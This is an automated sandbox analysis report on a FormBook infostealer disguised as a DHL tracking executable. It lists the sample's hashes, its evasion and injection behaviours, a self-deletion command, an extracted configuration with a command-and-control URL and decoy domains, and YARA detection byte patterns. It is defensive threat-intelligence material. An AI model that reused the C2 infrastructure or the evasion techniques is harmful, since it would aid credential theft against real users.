Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL AWB TRACKING DETAILS.exe

Overview

General Information

Sample Name:DHL AWB TRACKING DETAILS.exe
Analysis ID:562043
MD5:4e358b432ba956c13627beee054d68e5
SHA1:8791318da047e93f2a16cc6535eba5159228f832
SHA256:836696cddebff5d522acb2c105a404ceeb635df69b3c9544b5bebcef13bc3e86
Tags:DHLexeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Self deletion via cmd delete
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • DHL AWB TRACKING DETAILS.exe (PID: 6228 cmdline: "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" MD5: 4E358B432BA956C13627BEEE054D68E5)
    • DHL AWB TRACKING DETAILS.exe (PID: 6276 cmdline: "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" MD5: 4E358B432BA956C13627BEEE054D68E5)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 6932 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 7012 cmdline: /c del "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • explorer.exe (PID: 4636 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 5560 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.hdetpnipa.xyz/a34b/"], "decoy": ["mesonarte.com", "eksiwakun9.xyz", "dustcollectionconsultant.com", "heliosarchitecture.com", "chinaanalysisgroup.com", "nimbinhillshemp.com", "ychain.biz", "mountshastaart.com", "monstermangoloco.com", "bodhiandbear.com", "rootednft.xyz", "metayema.com", "zw21.xyz", "criccketworld.com", "segurobarato.net", "ananyacap.com", "momo-momo.xyz", "ezrealestatedeals.com", "ghrde.xyz", "idimol.com", "pcthspoe.xyz", "thewhiteswanharringworth.com", "che8760.com", "85111280.xyz", "apteka-magnolia.com", "proach.online", "portfolioabeckford.com", "affilinvest.com", "subspank.xyz", "odessamadrecoffeehouse.com", "onetrade.biz", "tianfuhg.com", "kibtitalikeniwenti.com", "terriblearttours.com", "saudirelief.com", "metacourting.xyz", "kimera.blue", "mgpsfm.com", "metawzrd.com", "veahhiodl.xyz", "alimasurfhotel.com", "sirensandiego.com", "gd-hxgg.com", "aurorarift.com", "clingbee.com", "zettavisor2021.xyz", "gregoryryankramer.art", "robertsonfandc.com", "sociedadgeograficacafe.com", "emilyhkeefer.com", "v-hush.com", "judithtuttle.xyz", "itbrandlink.com", "carrybicycles.com", "storge-evolution.com", "socnhhpa.xyz", "victorzark.com", "ghettoguy.com", "redtruckguy.com", "jeanmariewallendorf.com", "ocpdtel.xyz", "democracies.online", "bw529twonineh5.world", "chinhdohuyenthoai.xyz"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.636107094.0000000000D80000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000B.00000002.636107094.0000000000D80000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000B.00000002.636107094.0000000000D80000.00000004.00000800.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000000.359424691.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000000.359424691.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.DHL AWB TRACKING DETAILS.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.DHL AWB TRACKING DETAILS.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.DHL AWB TRACKING DETAILS.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a49:$sqlite3step: 68 34 1C 7B E1
        • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a78:$sqlite3text: 68 38 2A 90 C5
        • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
        0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 22 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 0000000B.00000002.636107094.0000000000D80000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.hdetpnipa.xyz/a34b/"], "decoy": ["mesonarte.com", "eksiwakun9.xyz", "dustcollectionconsultant.com", "heliosarchitecture.com", "chinaanalysisgroup.com", "nimbinhillshemp.com", "ychain.biz", "mountshastaart.com", "monstermangoloco.com", "bodhiandbear.com", "rootednft.xyz", "metayema.com", "zw21.xyz", "criccketworld.com", "segurobarato.net", "ananyacap.com", "momo-momo.xyz", "ezrealestatedeals.com", "ghrde.xyz", "idimol.com", "pcthspoe.xyz", "thewhiteswanharringworth.com", "che8760.com", "85111280.xyz", "apteka-magnolia.com", "proach.online", "portfolioabeckford.com", "affilinvest.com", "subspank.xyz", "odessamadrecoffeehouse.com", "onetrade.biz", "tianfuhg.com", "kibtitalikeniwenti.com", "terriblearttours.com", "saudirelief.com", "metacourting.xyz", "kimera.blue", "mgpsfm.com", "metawzrd.com", "veahhiodl.xyz", "alimasurfhotel.com", "sirensandiego.com", "gd-hxgg.com", "aurorarift.com", "clingbee.com", "zettavisor2021.xyz", "gregoryryankramer.art", "robertsonfandc.com", "sociedadgeograficacafe.com", "emilyhkeefer.com", "v-hush.com", "judithtuttle.xyz", "itbrandlink.com", "carrybicycles.com", "storge-evolution.com", "socnhhpa.xyz", "victorzark.com", "ghettoguy.com", "redtruckguy.com", "jeanmariewallendorf.com", "ocpdtel.xyz", "democracies.online", "bw529twonineh5.world", "chinhdohuyenthoai.xyz"]}
          Multi AV Scanner detection for submitted file
          Source: DHL AWB TRACKING DETAILS.exeVirustotal: Detection: 43%Perma Link
          Source: DHL AWB TRACKING DETAILS.exeReversingLabs: Detection: 48%
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.636107094.0000000000D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.359424691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.635990166.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.360270037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.409581872.000000000F123000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.362630153.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.436793150.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.394582472.000000000F123000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.436005605.00000000009A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: www.hdetpnipa.xyz/a34b/Avira URL Cloud: Label: phishing
          Multi AV Scanner detection for domain / URL
          Source: www.hdetpnipa.xyz/a34b/Virustotal: Detection: 9%Perma Link
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\nsr8F1B.tmp\vzhghptrhu.dllVirustotal: Detection: 37%Perma Link
          Source: C:\Users\user\AppData\Local\Temp\nsr8F1B.tmp\vzhghptrhu.dllReversingLabs: Detection: 25%
          Machine Learning detection for sample
          Source: DHL AWB TRACKING DETAILS.exeJoe Sandbox ML: detected
          Source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 31.2.explorer.exe.f07f840.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 20.0.explorer.exe.ad0f840.6.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 11.2.wlanext.exe.382f840.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 11.2.wlanext.exe.deef30.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 20.0.explorer.exe.ad0f840.3.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 20.0.explorer.exe.ad0f840.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: DHL AWB TRACKING DETAILS.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wntdll.pdbUGP source: DHL AWB TRACKING DETAILS.exe, 00000000.00000003.360349373.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, DHL AWB TRACKING DETAILS.exe, 00000000.00000003.360736432.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, DHL AWB TRACKING DETAILS.exe, 00000001.00000002.436271704.0000000000AFF000.00000040.00000800.00020000.00000000.sdmp, DHL AWB TRACKING DETAILS.exe, 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, wlanext.exe, 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, wlanext.exe, 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: DHL AWB TRACKING DETAILS.exe, DHL AWB TRACKING DETAILS.exe, 00000001.00000002.436271704.0000000000AFF000.00000040.00000800.00020000.00000000.sdmp, DHL AWB TRACKING DETAILS.exe, 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, wlanext.exe, 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wlanext.pdb source: DHL AWB TRACKING DETAILS.exe, 00000001.00000002.437702980.00000000029F0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wlanext.pdbGCTL source: DHL AWB TRACKING DETAILS.exe, 00000001.00000002.437702980.00000000029F0000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 0_2_00405D7C FindFirstFileA,FindClose,0_2_00405D7C
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004053AA
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 0_2_00402630 FindFirstFileA,0_2_00402630
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 4x nop then pop esi1_2_004172DE
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 4x nop then pop esi1_2_004172A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop esi11_2_00A172A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop esi11_2_00A172DE

          Networking

          barindex
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.hdetpnipa.xyz/a34b/
          Source: explorer.exe, 00000014.00000003.578175539.0000000004EF7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.543845759.0000000004EF8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.550839224.0000000004EF8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.555983128.0000000004EEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.553114910.0000000004EEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.566169156.0000000004ED2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000014.00000003.556038613.0000000004F3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.553294057.0000000004F3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.566295637.0000000004F3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.578401411.0000000004F3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
          Source: DHL AWB TRACKING DETAILS.exe, DHL AWB TRACKING DETAILS.exe, 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp, DHL AWB TRACKING DETAILS.exe, 00000000.00000000.352121005.0000000000409000.00000008.00000001.01000000.00000003.sdmp, DHL AWB TRACKING DETAILS.exe, 00000001.00000000.355752258.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: DHL AWB TRACKING DETAILS.exe, 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp, DHL AWB TRACKING DETAILS.exe, 00000000.00000000.352121005.0000000000409000.00000008.00000001.01000000.00000003.sdmp, DHL AWB TRACKING DETAILS.exe, 00000001.00000000.355752258.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000000.379142678.000000000095C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.366064196.000000000095C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.398584347.000000000095C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: unknownDNS traffic detected: queries for: www.chinaanalysisgroup.com
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 0_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404F61

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.636107094.0000000000D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.359424691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.635990166.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.360270037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.409581872.000000000F123000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.362630153.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.436793150.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.394582472.000000000F123000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.436005605.00000000009A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.636107094.0000000000D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.636107094.0000000000D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.359424691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.359424691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.635990166.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
